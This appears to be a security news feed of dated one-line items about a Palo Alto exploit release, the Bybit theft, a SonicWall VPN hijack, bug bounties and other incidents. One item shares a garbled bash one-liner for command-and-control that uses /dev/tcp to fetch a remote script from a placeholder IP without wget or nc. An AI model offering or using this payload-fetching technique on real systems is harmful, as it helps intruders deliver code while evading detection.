■■■■□ Google Released PoC Exploit For Palo Alto Firewall Command Injection Vulnerability. Google Released PoC Exploit For Palo Alto Firewall Command Injection Vulnerability
All posts by John Doe
February 22, 2025 at 12:56PM
5️⃣ 1 liner bash for C2 without using any native program like wget, nc etc, esp containers. bash-c “exec 3/dev/tcp/IP/80; echo -e GET/ youfile.sh HTTP/1.1\r\nHost; ip\r\nConnection: close\r\n\r\n’ >&3; cat yourfile.sh’ Source: Linkedin | Harvey Spec
February 22, 2025 at 12:46PM
■■□□□ Introduction to the IoT/Embedded Linux: The OpenWRT Project. https://www.hackers-arise.com/post/introduction-to-the-iot-embedded-linux-the-openwrt-project
February 22, 2025 at 12:45PM
■■■□□ User Email Disclosure via ID-Based Invitation. https://hackerone.com/reports/3003716
February 22, 2025 at 12:09PM
■■■■□ Unconfirmed: North Korea’s Lazarus Group stole $1.4 billion from Bybit.
February 22, 2025 at 12:10AM
■■■□□ Microsoft expands Copilot bug bounty targets, payouts. https://www.theregister.com/2025/02/20/microsoft_copilot_bug_bounty_updated/ https://msrc.microsoft.com/blog/2025/02/exciting-updates-to-the-copilot-ai-bounty-program-enhancing-security-and-incentivizing-innovation/
February 21, 2025 at 10:31PM
■■■□□ Bybit cryptocurrency exchange experienced a loss of approximately $1,400,000,000 today, primarily in ETH. The perpetrator employed sophisticated transaction chains to obfuscate the movement of funds and hinder traceability.
February 21, 2025 at 07:45PM
■■■■□ SonicWall CVE-2024-53704: SSL VPN Session Hijacking. https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking
February 21, 2025 at 07:43PM
■■■■□ 9️⃣ Apple removes cloud encryption feature from UK after the government ordered the company to build a backdoor for accessing user data — Bloomberg
February 21, 2025 at 06:18PM
■■□□□ Microsoft fixes Power Pages zero-day bug exploited in attacks. https://www.bleepingcomputer.com/news/security/microsoft-fixes-power-pages-zero-day-bug-exploited-in-attacks/